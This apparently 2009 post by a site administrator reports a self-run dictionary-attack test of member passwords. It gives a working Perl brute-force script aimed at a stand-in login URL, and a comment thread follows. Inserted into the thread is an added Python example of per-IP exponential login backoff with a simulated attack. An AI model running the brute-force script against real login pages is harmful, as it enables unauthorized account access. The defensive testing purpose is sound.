You have officially passed the stupid password test!


I have been working on a couple of security improvements for the site relating to login and authentication, primarily a policy for handling failed logins and bot attacks.  Doing that means testing it, so I wrote a script that performs a dictionary attack.


A dictionary attack is very simple: a program repeatedly tries to log into an account using a list of words, often an actual dictionary, since ordinary words are commonly used as passwords because they are easy to remember.


So what does this have to do with you, a loyal VG Press user?  Well, contrary to what you may think, I have no idea what your password is!  Every password is one-way hashed before it is sent to the server, then salted and hashed once more for good measure, so all I can see in the database is a garbled mess.


So I set my script loose using a list of the 500 worst passwords, which allegedly covers the passwords of 1 in every 9 users.


But every active VG Press member has a password that is not on the list of the 500 worst.  Hoorah!



BONUS SECTION


For those interested in the code behind the attack, it was written in Perl.  So as not to needlessly hand out a program for doing this to a live site, this isn't the exact program, but it's effectively the same.

 
use strict;
use warnings;
use HTTP::Request::Common qw(POST);
use LWP::UserAgent;

my $file = "dictionary.txt";    # one candidate password per line
open(my $fh, '<', $file) or die "Cannot open $file: $!";
print "Enter Username: ";
my $username = <STDIN>;
chomp $username;
while (my $word = <$fh>)
{
    chomp $word;
    my $content;
    do
    {
        my $ua = LWP::UserAgent->new;
        $ua->timeout(3);
        my $req = POST 'http://insecuresite.com/login',
            ["username" => $username,
             "password" => $word];
        my $response = $ua->request($req);
        $content = $response->content;
    }
    while ($content =~ /^500 read timeout/);   # retry the same word if the request timed out

    # the site answers a successful login with an empty body
    if (!(length $content > 0))
    {
        print "PASSWORD: $word\n";
        exit;
    }
}
close $fh;
print "No matches found\n";
exit;
Posted by Ellyoda Sat, 07 Mar 2009 05:06:40 (comments: 7)
 
Sat, 07 Mar 2009 05:20:45
So are you implementing a "Too many failed logins!" functionality into the site, or what do you plan on doing to counteract dictionary/script attacks like these and others?
 
Sat, 07 Mar 2009 05:39:44
The likely solution is going to be exponentially increasing minimum time period between log-in attempts based on IP address.
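The per-IP exponential backoff described in this reply, written out as an added example (not VG Press code); the delay values, the IP addresses and the 500-word list are constructed for the example, and the simulation replays the post's script at its 3-second timeout tempo:

```python
from dataclasses import dataclass

BASE_DELAY = 1.0       # assumed policy value (not the site's real setting): wait after the first failure
MAX_DELAY = 3600.0     # cap so a user behind a shared address is never locked out indefinitely
RESET_AFTER = 86400.0  # forget an address's failures after a day without attempts
SAMPLE_WORDS = ["word%d" % i for i in range(500)]  # constructed stand-in for the 500-worst list

@dataclass
class IpState:
    failures: int = 0
    next_allowed: float = 0.0
    last_seen: float = 0.0

class LoginThrottle:
    """Exponentially increasing minimum interval between login attempts, per IP address."""
    def __init__(self):
        self.state = {}

    def required_delay(self, failures):
        # 1s, 2s, 4s, 8s, ... doubling with each consecutive failure, capped at MAX_DELAY
        return 0.0 if failures == 0 else min(BASE_DELAY * 2 ** (failures - 1), MAX_DELAY)

    def attempt(self, ip, now, password_ok):
        """Returns "throttled", "failed" or "ok"; now is a timestamp in seconds."""
        s = self.state.setdefault(ip, IpState())
        if now - s.last_seen > RESET_AFTER:
            s.failures, s.next_allowed = 0, 0.0
        s.last_seen = now
        if now < s.next_allowed:
            return "throttled"          # rejected before the password is even checked
        if password_ok:
            del self.state[ip]          # a successful login clears the penalty
            return "ok"
        s.failures += 1
        s.next_allowed = now + self.required_delay(s.failures)
        return "failed"

def simulate_dictionary_attack(words, real_password, ip="203.0.113.7", interval=3.0):
    """Replay one guess per 3s from a single address; returns (evaluated, refused, found)."""
    throttle = LoginThrottle()
    evaluated = refused = 0
    for i, word in enumerate(words):
        result = throttle.attempt(ip, i * interval, word == real_password)
        if result == "throttled":
            refused += 1
            continue
        evaluated += 1
        if result == "ok":
            return evaluated, refused, True
    return evaluated, refused, False
```

Against the 500-word list only 11 guesses are actually checked before the delay exceeds the attacker's remaining run; the cap and the daily reset keep a legitimate user behind the same address from being locked out for good.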
 
Sat, 07 Mar 2009 05:43:17
Damn, I was hoping that password would be number!
 
Sat, 07 Mar 2009 08:12:18

Fuckin' A man!

 
Sun, 08 Mar 2009 11:22:33
I made my password specifically because I thought you could see it Yo.
 
Tue, 10 Mar 2009 01:01:26
Then it's a good thing I recently changed my password from "pussy" to something else.
 
Tue, 10 Mar 2009 20:48:41
Those 500 worst passwords are pretty funny. LOL Thankfully, mine's not even close to anything on that list.